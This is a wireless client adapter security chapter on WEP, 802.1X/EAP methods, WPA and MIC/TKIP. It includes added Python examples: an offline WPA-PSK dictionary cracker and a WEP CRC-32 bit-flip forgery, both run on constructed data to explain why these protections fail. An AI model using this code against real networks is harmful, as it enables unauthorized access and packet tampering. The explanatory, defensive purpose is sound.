This chapter describes the security features. The following topics are covered in the chapter.
•EAP (with Static or Dynamic WEP Keys)
•Additional WEP Key Security Features
•Synchronizing Security Features
You can protect your data as it is transmitted through your wireless network by encrypting it with Wired Equivalent Privacy (WEP) encryption keys. With WEP encryption, the transmitting device encrypts each packet with a WEP key, and the receiving device uses that same key to decrypt each packet. Plain WEP (RC4 keyed with a 24-bit initialization vector prepended to the secret key, and a CRC-32 integrity check) is known to be weak against both key recovery and packet tampering; the "Additional WEP Key Security Features" section describes the per-packet keying, message integrity check, and key rotation that mitigate those attacks, and WPA should be used wherever the client adapter, supplicant, and access point support it.
The WEP keys used to encrypt and decrypt transmitted data can be statically associated with your adapter or dynamically created as part of the EAP authentication process. The information in the "Static WEP Keys" and "EAP (with Static or Dynamic WEP Keys)" sections below can help you to decide which type of WEP keys to use. Dynamic WEP keys with EAP offer a higher degree of security than static WEP keys.
WEP keys, whether static or dynamic, are either 40 or 128 bits long. The 128-bit figure counts the 24-bit initialization vector that is sent in the clear with every packet, so the secret portion of a "128-bit" key is 104 bits. 128-bit WEP keys resist brute-force guessing far better than 40-bit keys, but the longer key does not remove WEP's design weaknesses in IV handling and integrity checking.
Note Refer to the "Additional WEP Key Security Features" section for information on three security features that can make your WEP keys even more secure.
Each device (or profile) within your wireless network can be assigned up to four static WEP keys. If a device receives a packet that is not encrypted with the appropriate key (as the WEP keys of all devices that are to communicate with each other must match), the device discards the packet and never delivers it to the intended receiver.
Static WEP keys are write-only and temporary; therefore, they cannot be read back from the client adapter, and they are lost when power to the adapter is removed or the Windows device is rebooted. Although the keys are temporary, you do not need to re-enter them each time the client adapter is inserted or the Windows device is rebooted because the keys are stored (in an encrypted format) in the registry of the Windows device. When the driver loads and reads the client adapter's registry parameters, it also finds the static WEP keys, decrypts them, and stores them in volatile memory on the adapter. Because the driver decrypts the registry copy without any user-supplied secret, treat that copy as obfuscated rather than as protected from anyone with administrative access to the Windows device.
The Security Tab window enables you to view the current WEP key settings for the client adapter and then to assign new WEP keys or overwrite existing WEP keys as well as to enable or disable static WEP. Refer to the "Entering a New Static WEP Key" section or "Disabling Static WEP" section for instructions.
The IEEE standard for wireless LAN access control is IEEE 802.1X (port-based network access control) applied to 802.11, commonly referred to simply as 802.1X. 802.1X carries the Extensible Authentication Protocol (EAP) between the client (the supplicant) and the access point (the authenticator); an access point that supports 802.1X acts as the interface between the wireless client and an authentication server such as a RADIUS server, to which the access point communicates over the wired network.
Three 802.1X authentication types can be selected in ACAT for use with Windows operating systems:
•LEAP—This authentication type is available for Windows 95, 98, NT, 2000, Me, and XP, as well as non-Windows systems. Support for LEAP is provided not in the Windows operating system but in your client adapter's firmware and the Cisco software that supports it. RADIUS servers that support LEAP include Cisco Secure ACS release 2.6 and later, Cisco Access Registrar release 1.7 and later, and Funk Software's Steel-Belted RADIUS release 3.0 and later. Note that LEAP's challenge/response exchange is based on MS-CHAP; an intruder who captures one exchange can test candidate passwords against it offline, so LEAP is only as strong as the passwords behind it. EAP-FAST (below) was introduced as its replacement.
LEAP can be enabled or disabled for a specific profile through ACAT. When enabled, a variety of configuration options are available, including how and when a username and password are entered to begin the authentication process.
The username and password are used by the client adapter to perform mutual authentication with the RADIUS server through the access point. The username and password are stored in the client adapter's volatile memory; therefore, they are temporary and need to be re-entered whenever power is removed from the adapter, typically because of the client adapter being ejected or the system powering down.
•EAP-FAST—This authentication type (Flexible Authentication via Secure Tunneling) is available for Windows 2000 and XP systems. Support for EAP-FAST is provided not in the Windows operating system but in your client adapter's firmware and the Cisco software that supports it. RADIUS servers that support EAP-FAST include Cisco Secure ACS release 3.2.3 and later.
Note The Install Wizard does not provide an error indication when a profile with EAP-FAST fails to install on a non-supported operating system.
EAP-FAST can be enabled or disabled for a specific profile using ACAT, or the ACU can be used if the EAP-FAST security module was selected during installation. When EAP-FAST is enabled, a variety of configuration options are available, including how and when a username and password are entered to begin the authentication process and whether automatic or manual protected access credentials (PAC) provisioning is used.
The username, password, and PAC are used by the client adapter to perform mutual authentication with the RADIUS server through the access point. The username and password need to be re-entered each time the client adapter is inserted or the Windows device is rebooted, unless you configure your adapter to use saved EAP-FAST credentials.
PACs are created by Cisco Secure ACS and are identified by an ID. The user obtains his or her own copy of the PAC from the server, and the ID links the PAC to the profile created by ACAT or the ACU. When manual PAC provisioning is enabled, the PAC file is manually copied from the server and imported into the client device using the ACU. The following rules govern PAC storage:
–In most cases PACs are provisioned and stored separately for each Windows logon user. These per-user PACs are not viewable by other users.
–If a profile is configured to use manual provisioning, each user must manually provision his or her own PAC for that profile using the ACU.
–PAC files can be added or replaced using the ACU import feature, but they cannot be removed or exported.
–For profiles configured with saved EAP-FAST usernames and passwords, the PACs are not stored per user but in a global PAC area shared by all users. Global PACs are also enabled when the No Network Connection Unless User Is Logged In checkbox is unchecked on the ACU. These global PACs can be imported using the ACU and used by all users.
Note Checking the Use Saved Username and Password check box in ACAT enables the option on the ACU. You must use the ACU to enter the EAP-FAST username and password parameters.
Note PACs are also stored globally on computers that use the Novell Network login prompt or any other third-party login application that does not share its credentials with the EAP-FAST supplicant.
EAP-FAST authentication is designed to support the following user databases over a wireless LAN:
–Cisco Secure ACS internal user database
–Cisco Secure ACS ODBC user database
–Windows NT/2000/2003 domain user database
–LDAP user database
LDAP user databases (such as NDS) support only manual PAC provisioning; the other three user databases support both automatic and manual PAC provisioning. The reason is that automatic provisioning authenticates the user inside the provisioning tunnel with MS-CHAPv2, which requires the server to hold the password in a form usable for that exchange, and a generic LDAP bind does not provide that. Bear in mind that the automatic provisioning tunnel is built with an anonymous Diffie-Hellman exchange and is not itself authenticated, so a rogue access point and server can interpose during that first exchange and capture a challenge/response for the user's password; where the user database allows it, manual provisioning over a trusted path avoids that exposure.
Note If the EAP-FAST security module was not selected during installation, the EAP-FAST option is unavailable in the ACU. To enable and disable EAP-FAST, you must run ACAT or the Install Wizard again and select EAP-FAST. EAP-FAST is supported in ACAT and Install Wizard versions 1.3 and later.
•EAP—Selecting this option enables you to use any 802.1X authentication type for which your operating system has support. For example, if your operating system uses the 802.1X supplicant, it provides native support for EAP-TLS authentication and general support for PEAP and EAP-SIM authentication.
Note To use EAP-TLS, PEAP, or EAP-SIM you must install the Microsoft 802.1X supplicant and the PEAP or EAP-SIM security module; configure your client adapter using ACAT or the ACU; enable the authentication type in Windows; and enable Network-EAP on the access point.
–EAP-TLS—EAP-TLS is enabled or disabled through the operating system and uses a dynamic session-based WEP key, derived by the client adapter and the RADIUS server from the TLS exchange, to encrypt data. Once enabled, a few configuration parameters must be set within the operating system.
RADIUS servers that support EAP-TLS include Cisco Secure ACS release 3.0 or later and Cisco Access Registrar release 1.8 or later.
Note EAP-TLS requires the use of a certificate. Refer to Microsoft's documentation for information on downloading and installing the certificate.
–Protected EAP (or PEAP)—PEAP authentication is designed to support One-Time Password (OTP), Windows NT or 2000 domain, and LDAP user databases over a wireless LAN. Like EAP-TLS, it first establishes a TLS tunnel in which the server presents a certificate, but the client then authenticates inside that tunnel with a password or PIN instead of a client certificate. Because only the server is authenticated by certificate, the client must be configured to validate the server certificate (the issuing CA and, where the supplicant allows it, the expected server name); otherwise a rogue access point and server can present their own certificate and intercept the inner authentication. PEAP is enabled or disabled through the operating system and uses a dynamic session-based WEP key, derived by the client adapter and the RADIUS server from the TLS exchange, to encrypt data. If your network uses an OTP user database, PEAP requires you to enter either a hardware token password or a software token PIN to start the EAP authentication process and gain access to the network. If your network uses a Windows NT or 2000 domain user database or an LDAP user database (such as NDS), PEAP requires you to enter your username, password, and domain name in order to start the authentication process.
RADIUS servers that support PEAP authentication include Cisco Secure ACS release 3.1 or later and Cisco Access Registrar release 3.5 or later.
Note Service Pack 1 for Windows XP and the Microsoft 802.1X supplicant for Windows 2000 include Microsoft's PEAP supplicant, which supports a Windows username and password only and does not operate with Cisco's PEAP supplicant. To use Cisco's PEAP supplicant, install the Install Wizard file after Service Pack 1 for Windows XP or the Microsoft 802.1X supplicant for Windows 2000. Otherwise, Cisco's PEAP supplicant is overwritten by Microsoft's PEAP supplicant.
–EAP-SIM—EAP-SIM authentication is designed for use in public wireless LANs and requires clients equipped with PCSC-compliant smartcard readers. The EAP-SIM supplicant included in the Install Wizard file supports only Gemplus SIM+ cards; however, an updated supplicant is available that supports standard GSM-SIM cards as well as more recent versions of the EAP-SIM protocol. The new supplicant is available for download from the ftpeng FTP server at the following URL:
ftp://ftpeng.cisco.com/ftp/pwlan/eapsim/CiscoEapSim.dll
Please note that the above requirements are necessary but not sufficient to successfully perform EAP-SIM authentication. Typically, you are also required to enter into a service contract with a WLAN service provider, who must support EAP-SIM authentication in its network. Also, while your PCSC smartcard reader may be able to read standard GSM-SIM cards or chips, EAP-SIM authentication usually requires your GSM cell phone account to be provisioned for WLAN service by your service provider.
EAP-SIM is enabled or disabled through the operating system and uses a dynamic session-based WEP key, derived by the client adapter and the RADIUS server from the authentication exchange, to encrypt data. EAP-SIM requires you to enter a user verification code, or PIN, for communication with the SIM card. You can choose to have the PIN stored in your computer or to be prompted to enter it after a reboot or prior to every authentication attempt.
RADIUS servers that support EAP-SIM include Cisco Access Registrar release 3.0 or later.
Note Because EAP-TLS, PEAP, and EAP-SIM authentication are enabled in the operating system and not in ACU, you cannot switch between these authentication types simply by switching profiles in ACU. You can create a profile in ACU that uses host-based EAP, but you must enable the specific authentication type in Windows (provided Windows uses the Microsoft 802.1X supplicant). In addition, Windows can be set for only one authentication type at a time; therefore, if you have more than one profile in ACU that uses host-based EAP and you want to use another authentication type, you must change authentication types in Windows after switching profiles in ACU.
When you enable Network-EAP or Require EAP on your access point and configure your client adapter for LEAP, EAP-FAST, EAP-TLS, PEAP, or EAP-SIM, authentication to the network occurs in the following sequence:
1. The client associates to an access point and begins the authentication process.
Note The client does not gain full access to the network until authentication between the client and the RADIUS server is successful.
2. Communicating through the access point, the client and RADIUS server complete the authentication process, with the password (LEAP, EAP-FAST, and PEAP), certificate (EAP-TLS), or internal key stored on the SIM card and in the service provider's Authentication Center (EAP-SIM) being the shared secret for authentication. The password, certificate, or internal key is never transmitted during the process. What LEAP does transmit, a challenge and the MS-CHAP-style response computed from the password, can be tested against a password dictionary offline, so weak passwords remain exposed.
3. If authentication is successful, the client and RADIUS server derive a dynamic, session-based WEP key that is unique to the client.
4. The RADIUS server transmits the key to the access point over the wired LAN inside the RADIUS reply, encrypted with the RADIUS shared secret. This "secure channel" is only as strong as that shared secret and the trustworthiness of the wired path, so use a long random secret and protect RADIUS traffic (for example, with IPsec) where the wired network is not trusted.
5. For the length of a session, or time period, the access point and the client use this key to encrypt or decrypt all unicast packets (and broadcast packets if the access point is set up to do so) that travel between them.
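The "secure channel" in step 4 is, in practice, the RADIUS reply itself: for EAP methods carried over RADIUS, the session key is normally delivered in the MS-MPPE-Recv-Key and MS-MPPE-Send-Key attributes and hidden with the MD5-based construction of RFC 2548, keyed by the RADIUS shared secret and the Access-Request's Request Authenticator. The following is an added example (not Cisco code) of that construction with a constructed secret, authenticator, and key; it shows that anyone who can read the wired RADIUS traffic and knows the shared secret recovers the WEP key, which is why the secret must be long and random and the path to the RADIUS server must be trusted.

```python
"""RFC 2548 MS-MPPE key attribute hiding: how a RADIUS server ships the
per-session key to the access point.

Added example, not Cisco code. The shared secret, Request Authenticator,
salt and key below are constructed for illustration.
"""
import hashlib
import secrets
from typing import Optional


def mppe_key_encrypt(shared_secret: bytes, request_authenticator: bytes,
                     key: bytes, salt: Optional[bytes] = None) -> bytes:
    """Return Salt || C, the attribute value (RFC 2548, section 2.4.2)."""
    assert len(request_authenticator) == 16
    if salt is None:
        # 16-bit salt; the most significant bit must be set.
        salt = bytes([0x80 | secrets.randbits(7), secrets.randbits(8)])
    assert len(salt) == 2 and salt[0] & 0x80
    # P = Key-Length (1 octet) || Key || zero padding to a multiple of 16.
    p = bytes([len(key)]) + key
    p += b"\x00" * (-len(p) % 16)
    out = b""
    prev = request_authenticator + salt  # b(1) = MD5(S || R || A)
    for i in range(0, len(p), 16):
        b = hashlib.md5(shared_secret + prev).digest()
        c = bytes(x ^ y for x, y in zip(p[i:i + 16], b))
        out += c
        prev = c  # b(i) = MD5(S || c(i-1))
    return salt + out


def mppe_key_decrypt(shared_secret: bytes, request_authenticator: bytes,
                     attr_value: bytes) -> bytes:
    """What the access point does with its copy of the shared secret."""
    salt, ciphertext = attr_value[:2], attr_value[2:]
    if len(salt) != 2 or not salt[0] & 0x80 or len(ciphertext) % 16:
        raise ValueError("malformed MPPE key attribute")
    p = b""
    prev = request_authenticator + salt
    for i in range(0, len(ciphertext), 16):
        c = ciphertext[i:i + 16]
        b = hashlib.md5(shared_secret + prev).digest()
        p += bytes(x ^ y for x, y in zip(c, b))
        prev = c
    key_len = p[0]
    if key_len + 1 > len(p):
        raise ValueError("bad key length")
    return p[1:1 + key_len]


def key_recovered(shared_secret: bytes, request_authenticator: bytes,
                  attr_value: bytes, expected: bytes) -> bool:
    """True if this shared secret yields `expected`: the secret is the channel."""
    try:
        return mppe_key_decrypt(shared_secret, request_authenticator, attr_value) == expected
    except ValueError:
        return False
```

A 13-byte (104-bit) WEP key becomes a 14-byte P, padded to one 16-byte block, so the attribute value is 18 bytes. Only the salt and the Request Authenticator vary per request; the MD5 chain adds no secrecy beyond the shared secret, so a short or reused secret exposes every session key sent over that link.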
Refer to the "Enabling LEAP" section for instructions on enabling LEAP, or to the "Enabling EAP-FAST" section for instructions on enabling EAP-FAST, or to the "Enabling Host-Based EAP" section for instructions on enabling EAP-TLS, PEAP, or EAP-SIM.
Refer to the IEEE 802.1X standard for more information on 802.1X authentication and to the following URL for additional information on RADIUS servers:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/secur_c/scprt2/scrad.htm
Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It is derived from, and is forward compatible with, the IEEE 802.11i standard, which was still in draft when WPA was published. WPA leverages Temporal Key Integrity Protocol (TKIP) for data protection and 802.1X for authenticated key management.
WPA supports two mutually exclusive key management types: WPA and WPA-Pre-shared key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK.
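With WPA-PSK the pre-shared key is the PMK, and everything else in the 4-way handshake (addresses, nonces, the EAPOL-Key frame and its MIC) is sent in the clear, so a passive listener can test passphrase guesses offline against one captured handshake. The following added example (not Cisco code) shows the IEEE 802.11i derivations that make this possible: the PBKDF2 passphrase-to-PMK step, the PRF-512 pairwise transient key, and the TKIP EAPOL-Key MIC check; the MAC addresses, nonces and EAPOL-Key frame are constructed here, not captured, and the "capture" is generated from the real passphrase so the attack can be verified locally.

```python
"""WPA-PSK: passphrase to PMK to PTK, and the offline check that makes a weak
pre-shared key recoverable from one captured 4-way handshake.

Added example, not Cisco code. PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096,
32); PTK = PRF-512(PMK, "Pairwise key expansion", addresses || nonces); for
TKIP the EAPOL-Key MIC is HMAC-MD5 keyed with the first 16 bytes of the PTK
(the KCK). All handshake values below are constructed.
"""
import hashlib
import hmac


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """The pre-shared key: a 256-bit PMK from the passphrase and SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key; PTK[0:16] is the KCK that keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic_tkip(kck: bytes, eapol_key_frame_mic_zeroed: bytes) -> bytes:
    """TKIP EAPOL-Key MIC: HMAC-MD5 over the frame with the MIC field zeroed."""
    return hmac.new(kck, eapol_key_frame_mic_zeroed, hashlib.md5).digest()


def build_capture(passphrase: str, ssid: str) -> dict:
    """Construct what a passive listener sees in message 2 of the handshake."""
    capture = {
        "ap": bytes.fromhex("001122334455"),      # constructed AP address
        "sta": bytes.fromhex("66778899aabb"),     # constructed client address
        "anonce": bytes(range(32)),               # constructed nonces
        "snonce": bytes(range(32, 64)),
        # EAPOL-Key body with its MIC field set to zero (constructed bytes).
        "eapol": b"\x01\x03\x00\x5f\xfe\x01\x0a" + bytes(88),
    }
    kck = wpa_ptk(wpa_psk_pmk(passphrase, ssid), capture["ap"], capture["sta"],
                  capture["anonce"], capture["snonce"])[:16]
    capture["mic"] = eapol_mic_tkip(kck, capture["eapol"])
    return capture


def crack_psk(candidates, ssid: str, capture: dict):
    """Offline dictionary attack: every input except the passphrase is public."""
    for passphrase in candidates:
        pmk = wpa_psk_pmk(passphrase, ssid)
        kck = wpa_ptk(pmk, capture["ap"], capture["sta"],
                      capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic_tkip(kck, capture["eapol"]), capture["mic"]):
            return passphrase
    return None
```

The 4096 PBKDF2 iterations slow each guess but do not stop the attack; they only make a short or dictionary passphrase take longer to fall. Where the supplicant and server support it, WPA with 802.1X (a per-user EAP authentication generating a fresh PMK per session) avoids this exposure entirely; where WPA-PSK must be used, choose a long random passphrase.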
Note Only 350 series and CB20A cards that are installed on computers running Windows 2000 or XP and running LEAP, EAP-FAST, or host-based EAP authentication can be used with WPA.
Support for WPA is available in Install Wizard version 1.2 or later. However, if you want to use host-based EAP authentication with WPA, you must also install a host supplicant with WPA support. The following host supplicants are recommended for use with Cisco Aironet client adapters:
•Funk Odyssey Client supplicant release 2.2 (for Windows 2000)
•Windows XP Service Pack 1 and Microsoft supplicant Q815485 (for Windows XP)
Refer to the "Enabling LEAP" section for instructions on enabling LEAP with WPA or to the "Enabling Host-Based EAP" section for instructions on enabling EAP-TLS, PEAP, or EAP-SIM with WPA.
WPA must also be enabled on the access point. Access points must use Cisco IOS Release 12.2(11)JA or later to enable WPA. Refer to the documentation for your access point for instructions on enabling this feature.
Some applications that run on a client device may require fast roaming between access points. For example, voice applications require seamless roaming to prevent delays and gaps in conversation. Support for fast roaming is available for LEAP-enabled clients in Install Wizard version 1.1 or later or for EAP-FAST-enabled clients in Install Wizard version 1.3 or later.
During normal operation, LEAP- or EAP-FAST-enabled clients mutually authenticate with a new access point by performing a complete LEAP or EAP-FAST authentication, including communication with the main RADIUS server. However, when you configure your wireless LAN for fast roaming, LEAP- or EAP-FAST-enabled clients securely roam from one access point to another without the need to reauthenticate with the RADIUS server. Using Cisco Centralized Key Management (CCKM), an access point that is configured for wireless domain services (WDS) uses a fast rekeying technique that enables client devices to roam from one access point to another in under 150 milliseconds (ms). Fast roaming ensures that there is no perceptible delay in time-sensitive applications such as wireless Voice over IP (VoIP), enterprise resource planning (ERP), or Citrix-based solutions.
The fast roaming feature is enabled on the client adapter in two different ways, depending on the software installed:
•If you are using client adapter firmware version 5.40.xx (which is included in Install Wizard version 1.3), you need to enable fast roaming in ACAT or Aironet Client Utility (ACU) version 6.3. For additional details, refer to Step 11 in the "Enabling LEAP" section or to Step 12 in the "Enabling EAP-FAST" section.
•If you are using client adapter firmware version 5.20.17 (which is included in Install Wizard version 1.1), fast roaming is supported automatically.
Regardless of how fast roaming is enabled on the client adapter, it must also be enabled on the access point.
Note Access points must use Cisco IOS Release 12.2(11)JA or later to enable fast roaming. Refer to the documentation for your access point for instructions on enabling this feature.
Note If the Microsoft 802.1X supplicant is installed on your computer, you must disable one or two Windows parameters in order for this feature to operate correctly. Refer to Step 13 in the "Enabling LEAP" section for details.
Client adapter firmware version 5.02.20 or later and the following access point software releases support a feature that is designed to detect access points that fail LEAP authentication:
•VxWorks release 12.00T or later (340, 350, and 1200 series access points)
•Cisco IOS Release 12.2(4)JA or later (1100 series access points)
An access point running one of these software releases records a message in the system log when a client running firmware version 5.02.20 or later discovers and reports another access point in the wireless network that has failed LEAP or EAP-FAST authentication.
The process takes place as follows:
1. A client with a LEAP or EAP-FAST profile attempts to associate to access point A.
2. Access point A does not handle the LEAP or EAP-FAST authentication successfully, perhaps because the access point does not understand LEAP or EAP-FAST or cannot communicate to a trusted LEAP or EAP-FAST authentication server.
3. The client records the MAC address for access point A and the reason why the association failed.
4. The client associates successfully to access point B.
5. The client sends the MAC address of access point A and the reason code for the failure to access point B.
6. Access point B logs the failure in the system log.
Note This feature does not need to be enabled on the client adapter or access point; it is supported automatically in both devices. However, the client adapters and access points must use the firmware versions or software releases shown above (or later).
The three security features discussed in this section (MIC, TKIP, and broadcast key rotation) are designed to prevent sophisticated attacks on your wireless network's WEP keys. These features do not need to be enabled on the client adapter; they are supported automatically in the firmware and driver versions included in the Install Wizard file. However, they must be enabled on the access point.
For instructions on enabling these security features on your access point, refer to the corresponding software configuration guide or the installation and configuration guide available at the following URL:
http://www.cisco.com/univercd/cc/td/doc/product/wireless/index.htm.
Note The 340 and 350 series access points require VxWorks 11.10T or later to enable these security features. Refer to the documentation for your access point for instructions on enabling these security features.
MIC prevents bit-flip attacks on encrypted packets. In a bit-flip attack, an intruder intercepts an encrypted message, alters it slightly, and retransmits it, and the receiver accepts the retransmitted message as legitimate; WEP's CRC-32 integrity check value does not stop this because CRC-32 is linear, so the intruder can adjust the encrypted check value to match the altered data without knowing the key. The MIC adds a few bytes to each packet, computed with a key the intruder does not have, so that tampering is detected and the packet is discarded.
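The attack described above, and the reason a keyed MIC stops it where WEP's CRC-32 does not, in an added example that is not Cisco code: it builds WEP frames as the "Static WEP Keys" section describes (a 24-bit IV in the clear, RC4 keyed with IV || key, a CRC-32 integrity check value under the encryption), flips chosen plaintext bits through the ciphertext while patching the check value, and then repeats the attack against a frame carrying a keyed MIC. The truncated HMAC used as the MIC is a stand-in for the per-packet MIC the access point and driver negotiate, not Cisco's algorithm, and the keys, IV and frame contents are constructed.

```python
"""WEP framing, the CRC-32 bit-flip attack, and a keyed MIC that detects it.

Added example, not Cisco code. RC4 and the IV || key construction are WEP's
own; the MIC is a truncated HMAC standing in for the real per-packet MIC, and
the keys, IV and frames are constructed for illustration.
"""
import hashlib
import hmac
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (3 bytes, in the clear) || RC4(IV || key) over plaintext || CRC-32 ICV."""
    assert len(iv) == 3 and len(key) in (5, 13), "40- or 104-bit secret, 24-bit IV"
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext, or None when the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    dec = xor_bytes(body, rc4_keystream(iv + key, len(body)))
    plaintext, icv = dec[:-4], dec[-4:]
    if struct.unpack("<I", icv)[0] != zlib.crc32(plaintext):
        return None
    return plaintext


def bit_flip(frame: bytes, delta: bytes) -> bytes:
    """Attacker: flip plaintext bits through the ciphertext without the key.

    CRC-32 is affine over GF(2): crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros),
    so the encrypted ICV can be patched to match the altered payload.
    """
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    return iv + xor_bytes(body[:n], delta) + xor_bytes(body[n:], struct.pack("<I", icv_delta))


MIC_LEN = 8  # constructed stand-in length for the per-packet MIC


def wep_mic_encrypt(key: bytes, mic_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Same framing, with a keyed MIC over the plaintext placed under the encryption."""
    mic = hmac.new(mic_key, plaintext, hashlib.sha256).digest()[:MIC_LEN]
    return wep_encrypt(key, iv, plaintext + mic)


def wep_mic_decrypt(key: bytes, mic_key: bytes, frame: bytes):
    """Return the plaintext only if both the ICV and the keyed MIC verify."""
    dec = wep_decrypt(key, frame)
    if dec is None:
        return None
    plaintext, mic = dec[:-MIC_LEN], dec[-MIC_LEN:]
    expected = hmac.new(mic_key, plaintext, hashlib.sha256).digest()[:MIC_LEN]
    return plaintext if hmac.compare_digest(mic, expected) else None


def demo():
    """Rewrite fields in a frame the attacker cannot read; return both outcomes."""
    key, mic_key, iv = bytes.fromhex("0102030405"), b"constructed-mic-key", b"\x00\x00\x07"
    original = b"to=10.0.0.5 pay=0100"
    tampered = b"to=10.0.0.9 pay=9100"
    delta = xor_bytes(original, tampered)  # attacker only needs to guess the layout
    plain_wep = wep_decrypt(key, bit_flip(wep_encrypt(key, iv, original), delta))
    # With a MIC the attacker leaves the MIC bytes alone (zero delta); the CRC
    # still verifies, but the keyed MIC over the altered plaintext does not.
    mic_frame = wep_mic_encrypt(key, mic_key, iv, original)
    with_mic = wep_mic_decrypt(key, mic_key, bit_flip(mic_frame, delta + bytes(MIC_LEN)))
    return plain_wep, with_mic
```

`demo()` returns the forged plaintext accepted by plain WEP and `None` for the MIC-protected frame. The attacker never learns the key or the original plaintext; knowing (or guessing) the position of the field to change is enough, which is why a linear check value under a stream cipher provides no integrity at all.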
The Status window indicates if MIC is being used, and the Statistics window provides MIC statistics.
Note If you enable MIC on the access point, your client adapter's driver must support this feature; otherwise, the client cannot associate.
This feature, also referred to as WEP key hashing, defends against an attack on WEP in which the intruder uses the initialization vector (IV) in encrypted packets to calculate the WEP key. In plain WEP the 24-bit IV is simply prepended to the secret key to form the RC4 key, so certain IV values leak information about the key bytes, and the small IV space means keystreams are eventually reused. Key hashing mixes the IV and the base key into a different per-packet RC4 key, removing the predictability that an intruder relies on to determine the WEP key by exploiting IVs. It protects both unicast and broadcast WEP keys.
Note If you enable TKIP on the access point, your client adapter's firmware must support this feature; otherwise, the client cannot associate.
Note TKIP is automatically enabled whenever WPA is enabled and disabled whenever WPA is disabled.
EAP authentication provides dynamic unicast WEP keys for client devices but uses static broadcast, or multicast, keys. When you enable broadcast WEP key rotation, the access point provides a dynamic broadcast WEP key and changes it at the interval you select. When you enable this feature, only wireless client devices using LEAP, EAP-TLS, PEAP, or EAP-SIM authentication can associate to the access point. Client devices using static WEP (with open or shared key authentication) cannot associate.
In order to use any of the security features discussed in this section, both your client adapter and the access point to which it associates must be set appropriately. Table 5-1 indicates the client and access point settings required for each security feature. Refer to "Installed Components Tab," and the "Security Tab" section for installation and configuration instructions for your client adapter's security features. Refer to the documentation for your access point for instructions on enabling any of these features for your access point.